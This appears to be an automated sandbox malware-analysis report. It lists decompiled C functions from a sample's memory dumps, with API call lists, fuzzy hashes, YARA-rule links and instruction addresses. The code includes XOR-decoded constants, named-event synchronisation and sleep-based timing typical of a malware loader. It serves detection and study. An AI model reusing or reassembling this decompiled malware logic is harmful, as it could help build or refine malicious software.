                                                                                                                                  • Opcode Fuzzy Hash: 8188d7a4ffbbb144be4b84affb55701c2435caa3130b00a23f9909253a90e442
                                                                                                                                  • Instruction Fuzzy Hash: B5515079E00919EFCB01DFA8C5888AEF7BAFF8D701B144595E915EB214D731AD41CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A3273, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 031A32AE
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A3393
                                                                                                                                    • Part of subcall function 031A5920: SysAllocString.OLEAUT32(031AC2B0), ref: 031A5970
                                                                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 031A33E6
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A33F5
                                                                                                                                    • Part of subcall function 031A3D39: Sleep.KERNEL32(000001F4), ref: 031A3D81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3193056040-0
                                                                                                                                  • Opcode ID: 5c58974ee786e3b6e0af2339962f3171ea3b604ae0cc1bf3282e7d612979518d
                                                                                                                                  • Instruction ID: fdf300eed13ff1c3c17b75482580fb8a5a8b848233fd3f10c4cd154358ec7a62
                                                                                                                                  • Opcode Fuzzy Hash: 5c58974ee786e3b6e0af2339962f3171ea3b604ae0cc1bf3282e7d612979518d
                                                                                                                                  • Instruction Fuzzy Hash: 13515C7D604A09EFDB01DFA8C848A9EB7B5BF8C741B188C29E515DB210DB71ED46CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A7B30, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                  			E031A7B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E031A47C4(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E031A227C(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E031A3C06(_t101,  &_v428, _a8, _t96 - _t81);
					E031A3C06(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E031A227C(_t101, 0x31ad168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E031A227C(_a16, _a4);
						E031A3450(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L031AAED0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L031AAECA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E031A2420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E031A3F60(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E031A2775(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x31ad168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                                                  0x031a7b33
                                                                                                                                  0x031a7b3f
                                                                                                                                  0x031a7b45
                                                                                                                                  0x031a7b4a
                                                                                                                                  0x031a7b4e
                                                                                                                                  0x031a7cc0
                                                                                                                                  0x031a7cc4
                                                                                                                                  0x031a7cc4
                                                                                                                                  0x031a7b54
                                                                                                                                  0x031a7b58
                                                                                                                                  0x031a7b5c
                                                                                                                                  0x031a7b5f
                                                                                                                                  0x031a7b6a
                                                                                                                                  0x031a7b70
                                                                                                                                  0x031a7b75
                                                                                                                                  0x031a7b78
                                                                                                                                  0x031a7b92
                                                                                                                                  0x031a7ba1
                                                                                                                                  0x031a7bad
                                                                                                                                  0x031a7bb7
                                                                                                                                  0x031a7bbc
                                                                                                                                  0x031a7bbe
                                                                                                                                  0x031a7bc1
                                                                                                                                  0x031a7c78
                                                                                                                                  0x031a7c7e
                                                                                                                                  0x031a7c8f
                                                                                                                                  0x031a7ca2
                                                                                                                                  0x031a7cb8
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7cbd
                                                                                                                                  0x031a7bca
                                                                                                                                  0x031a7bd1
                                                                                                                                  0x031a7bd5
                                                                                                                                  0x031a7bdb
                                                                                                                                  0x031a7bdd
                                                                                                                                  0x031a7bdf
                                                                                                                                  0x031a7be1
                                                                                                                                  0x031a7be3
                                                                                                                                  0x031a7bed
                                                                                                                                  0x031a7bf2
                                                                                                                                  0x031a7bf4
                                                                                                                                  0x031a7bf6
                                                                                                                                  0x031a7bf7
                                                                                                                                  0x031a7bf8
                                                                                                                                  0x031a7bf9
                                                                                                                                  0x031a7c00
                                                                                                                                  0x031a7c07
                                                                                                                                  0x031a7c0a
                                                                                                                                  0x031a7c0a
                                                                                                                                  0x031a7bd7
                                                                                                                                  0x031a7bd7
                                                                                                                                  0x031a7bd7
                                                                                                                                  0x031a7c12
                                                                                                                                  0x031a7c1a
                                                                                                                                  0x031a7c26
                                                                                                                                  0x031a7c2b
                                                                                                                                  0x031a7c2b
                                                                                                                                  0x031a7c30
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7c32
                                                                                                                                  0x031a7c35
                                                                                                                                  0x031a7c42
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7c44
                                                                                                                                  0x031a7c44
                                                                                                                                  0x031a7c51
                                                                                                                                  0x031a7c2b
                                                                                                                                  0x031a7c30
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7c30
                                                                                                                                  0x031a7c5b
                                                                                                                                  0x031a7c5e
                                                                                                                                  0x031a7c61
                                                                                                                                  0x031a7c68
                                                                                                                                  0x031a7c68
                                                                                                                                  0x031a7c75
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7c75
                                                                                                                                  0x031a7b61
                                                                                                                                  0x031a7b65
                                                                                                                                  0x031a7b66
                                                                                                                                  0x031a7b68
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7b68
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 031A7BE3
                                                                                                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 031A7BF9
                                                                                                                                  • memset.NTDLL ref: 031A7CA2
                                                                                                                                  • memset.NTDLL ref: 031A7CB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$_allmul_aulldiv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3041852380-0
                                                                                                                                  • Opcode ID: 03c8a768085c2f5c4c9dfc37262a6471f894c6348c8c4b73c8a534286ed5d131
                                                                                                                                  • Instruction ID: 4533632b5438df054bc21a9240a4c1f875eee70ceef64961fbdbc636d1ffa5d5
                                                                                                                                  • Opcode Fuzzy Hash: 03c8a768085c2f5c4c9dfc37262a6471f894c6348c8c4b73c8a534286ed5d131
                                                                                                                                  • Instruction Fuzzy Hash: B841A279A00619ABDB10EFACCC40BEEB7B5EF4E311F104565F9199B280DB709A558B90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A7CC7, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E031A7CC7(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x31ad2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x31ad2e0; // 0x2a2a5a8
				_t3 = _t8 + 0x31ae876; // 0x61636f4c
				_t25 = 0;
				_t30 = E031A3CC2(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x31ad2e4, 1, 0, _t30);
					E031A4AAB(_t30);
				}
				_t12 =  *0x31ad294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E031A4A03() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E031A1000(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x31ad108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E031A5AB2(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                                                                                                  0x031a7cc8
                                                                                                                                  0x031a7ccf
                                                                                                                                  0x031a7cd9
                                                                                                                                  0x031a7cdd
                                                                                                                                  0x031a7ce3
                                                                                                                                  0x031a7cf2
                                                                                                                                  0x031a7cf9
                                                                                                                                  0x031a7cfd
                                                                                                                                  0x031a7d0f
                                                                                                                                  0x031a7d11
                                                                                                                                  0x031a7d11
                                                                                                                                  0x031a7d16
                                                                                                                                  0x031a7d1d
                                                                                                                                  0x031a7d74
                                                                                                                                  0x031a7d74
                                                                                                                                  0x031a7d7a
                                                                                                                                  0x031a7d7c
                                                                                                                                  0x031a7d7c
                                                                                                                                  0x031a7d86
                                                                                                                                  0x031a7d8a
                                                                                                                                  0x031a7d9c
                                                                                                                                  0x031a7d9c
                                                                                                                                  0x031a7da0
                                                                                                                                  0x031a7da6
                                                                                                                                  0x031a7da6
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7d36
                                                                                                                                  0x031a7d3b
                                                                                                                                  0x031a7d43
                                                                                                                                  0x031a7d47
                                                                                                                                  0x031a7d4b
                                                                                                                                  0x031a7d4b
                                                                                                                                  0x031a7d58
                                                                                                                                  0x031a7d5c
                                                                                                                                  0x031a7d60
                                                                                                                                  0x031a7db5
                                                                                                                                  0x031a7dbb
                                                                                                                                  0x031a7dbb
                                                                                                                                  0x031a7d6e
                                                                                                                                  0x031a7d72
                                                                                                                                  0x031a7da9
                                                                                                                                  0x031a7dab
                                                                                                                                  0x031a7dae
                                                                                                                                  0x031a7dae
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7dab
                                                                                                                                  0x031a7d72
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7d5c

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A3CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05BD9B38,00000000,?,?,69B25F44,00000005,031AD00C,?,?,031A539B), ref: 031A3CF8
                                                                                                                                    • Part of subcall function 031A3CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 031A3D1C
                                                                                                                                    • Part of subcall function 031A3CC2: lstrcat.KERNEL32(00000000,00000000), ref: 031A3D24
                                                                                                                                  • CreateEventA.KERNEL32(031AD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,031A21B6,?,00000001,?), ref: 031A7D08
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,031A21B6,00000000,00000000,?,00000000,?,031A21B6,?,00000001,?,?,?,?,031A555B), ref: 031A7D68
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,031A21B6,?,00000001,?), ref: 031A7D96
                                                                                                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,031A21B6,?,00000001,?,?,?,?,031A555B), ref: 031A7DAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 73268831-0
                                                                                                                                  • Opcode ID: 3ddf5819deb1e89a466cc6d62dd5bc53b9adbdc6aff4c1db3b4f3cf2e51a9e97
                                                                                                                                  • Instruction ID: a3ccf2b21ebba7fa7da5d748933ca970e317460ec46f4ac0718f642d1cf38ed1
                                                                                                                                  • Opcode Fuzzy Hash: 3ddf5819deb1e89a466cc6d62dd5bc53b9adbdc6aff4c1db3b4f3cf2e51a9e97
                                                                                                                                  • Instruction Fuzzy Hash: E121263E600F425BC731EAAC9C44A7BF799FF8C713F190626F946DB184DB60C94182A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F02A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1384045349-0
                                                                                                                                  • Opcode ID: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction ID: 0903cdbf6cd7a2f8dbe30e1ef9198d78cd119f97495db3acb285da0d538c4767
                                                                                                                                  • Opcode Fuzzy Hash: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction Fuzzy Hash: 5D4106B1C00258DFDB14CFE8C940BDDBBB8BF49308F108AA9E419AB281EB755A44CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A2107, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 40%
                                                                                                                                  			E031A2107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E031A3946(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E031A65EA(_t23);
						}
					}
					return _t38;
				}
				if(E031A37AC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x31ad2e4, 1, 0,  *0x31ad384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E031A24BE(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E031A282B(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E031A51BB(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E031A7CC7( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                                                  0x031a2107
                                                                                                                                  0x031a2114
                                                                                                                                  0x031a211a
                                                                                                                                  0x031a211b
                                                                                                                                  0x031a211c
                                                                                                                                  0x031a211d
                                                                                                                                  0x031a211e
                                                                                                                                  0x031a2122
                                                                                                                                  0x031a212e
                                                                                                                                  0x031a2132
                                                                                                                                  0x031a21ba
                                                                                                                                  0x031a21ba
                                                                                                                                  0x031a21bd
                                                                                                                                  0x031a21bf
                                                                                                                                  0x031a21c7
                                                                                                                                  0x031a21c7
                                                                                                                                  0x031a21cd
                                                                                                                                  0x031a21d0
                                                                                                                                  0x031a21d0
                                                                                                                                  0x031a21cd
                                                                                                                                  0x031a21db
                                                                                                                                  0x031a21db
                                                                                                                                  0x031a2145
                                                                                                                                  0x031a2147
                                                                                                                                  0x031a2147
                                                                                                                                  0x031a215e
                                                                                                                                  0x031a2162
                                                                                                                                  0x031a2165
                                                                                                                                  0x031a2170
                                                                                                                                  0x031a2177
                                                                                                                                  0x031a2177
                                                                                                                                  0x031a2180
                                                                                                                                  0x031a2184
                                                                                                                                  0x031a2192
                                                                                                                                  0x031a2186
                                                                                                                                  0x031a2186
                                                                                                                                  0x031a2187
                                                                                                                                  0x031a2188
                                                                                                                                  0x031a2189
                                                                                                                                  0x031a218a
                                                                                                                                  0x031a218b
                                                                                                                                  0x031a218b
                                                                                                                                  0x031a2197
                                                                                                                                  0x031a219a
                                                                                                                                  0x031a219e
                                                                                                                                  0x031a21a0
                                                                                                                                  0x031a21a0
                                                                                                                                  0x031a21a7
                                                                                                                                  0x00000000
                                                                                                                                  0x031a21a9
                                                                                                                                  0x031a21a9
                                                                                                                                  0x031a21b6
                                                                                                                                  0x00000000
                                                                                                                                  0x031a21b6

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(031AD2E4,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,031A555B,?,00000001,?), ref: 031A2158
                                                                                                                                  • SetEvent.KERNEL32(00000000,?,?,?,031A555B,?,00000001,?,00000002,?,?,031A53C9,?), ref: 031A2165
                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,031A555B,?,00000001,?,00000002,?,?,031A53C9,?), ref: 031A2170
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,031A555B,?,00000001,?,00000002,?,?,031A53C9,?), ref: 031A2177
                                                                                                                                    • Part of subcall function 031A24BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,031A2197,?,031A2197,?,?,?,?,?,031A2197,?), ref: 031A2598
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2559942907-0
                                                                                                                                  • Opcode ID: eb137c6dc9a39ee144ebf9d6fe2c2b5a0c7a9299bb11fe495993142e39d4029b
                                                                                                                                  • Instruction ID: 873858587930dd1bdc1462aacb68a68a0416496e49ea538793c054a40649bb6e
                                                                                                                                  • Opcode Fuzzy Hash: eb137c6dc9a39ee144ebf9d6fe2c2b5a0c7a9299bb11fe495993142e39d4029b
                                                                                                                                  • Instruction Fuzzy Hash: 1921457E900A19ABCB14FFEC88849AEB7BDDF4C356B054825EB11E7104D734D9868BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E9308CB, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction ID: e7c625cf5c8ee33ed51a7d1beea6d955a464cdec547837539f31e2f1f58af872
                                                                                                                                  • Opcode Fuzzy Hash: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction Fuzzy Hash: C221D872E05631EFEB115AE98C44B5A776D9F47BA0F310521E955AB384F630ED008DD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A22D2, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E031A22D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E031A75F6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                                                  0x031a22de
                                                                                                                                  0x031a22e2
                                                                                                                                  0x031a22e3
                                                                                                                                  0x031a22e4
                                                                                                                                  0x031a22e6
                                                                                                                                  0x031a22e8
                                                                                                                                  0x031a22eb
                                                                                                                                  0x031a22f0
                                                                                                                                  0x031a2387
                                                                                                                                  0x031a238e
                                                                                                                                  0x031a238e
                                                                                                                                  0x031a22f9
                                                                                                                                  0x031a2300
                                                                                                                                  0x031a2310
                                                                                                                                  0x031a2310
                                                                                                                                  0x031a2316
                                                                                                                                  0x031a2318
                                                                                                                                  0x031a231d
                                                                                                                                  0x031a2326
                                                                                                                                  0x031a232c
                                                                                                                                  0x031a2331
                                                                                                                                  0x031a233c
                                                                                                                                  0x031a2340
                                                                                                                                  0x031a2342
                                                                                                                                  0x031a2343
                                                                                                                                  0x031a234c
                                                                                                                                  0x031a2350
                                                                                                                                  0x031a2361
                                                                                                                                  0x031a2352
                                                                                                                                  0x031a2357
                                                                                                                                  0x031a235c
                                                                                                                                  0x031a236b
                                                                                                                                  0x031a236b
                                                                                                                                  0x031a2340
                                                                                                                                  0x031a2371
                                                                                                                                  0x031a2377
                                                                                                                                  0x031a2377
                                                                                                                                  0x031a2380
                                                                                                                                  0x031a2385
                                                                                                                                  0x031a2385
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1198164300-0
                                                                                                                                  • Opcode ID: ba11f93be651fa30c13de28ff5e8f55d830dc4d6cada5e50a5516c80ba0d45af
                                                                                                                                  • Instruction ID: d2c1dc9343a996f3bc44820e896162b88e26b1e0f2cf89a7febefe33e13a5591
                                                                                                                                  • Opcode Fuzzy Hash: ba11f93be651fa30c13de28ff5e8f55d830dc4d6cada5e50a5516c80ba0d45af
                                                                                                                                  • Instruction Fuzzy Hash: 2D21417D900609FFCB11DFA8C98499EBBB9FF4D302B1445A9E941E7210EB70DA41CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                  • _free.LIBCMT ref: 6E92F2FB
                                                                                                                                  • _free.LIBCMT ref: 6E92F331
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: 23ed0a1c342dbd2ce7f7524b36b7aafebd5da9a912bdbe91f9a1c7b4e7a75932
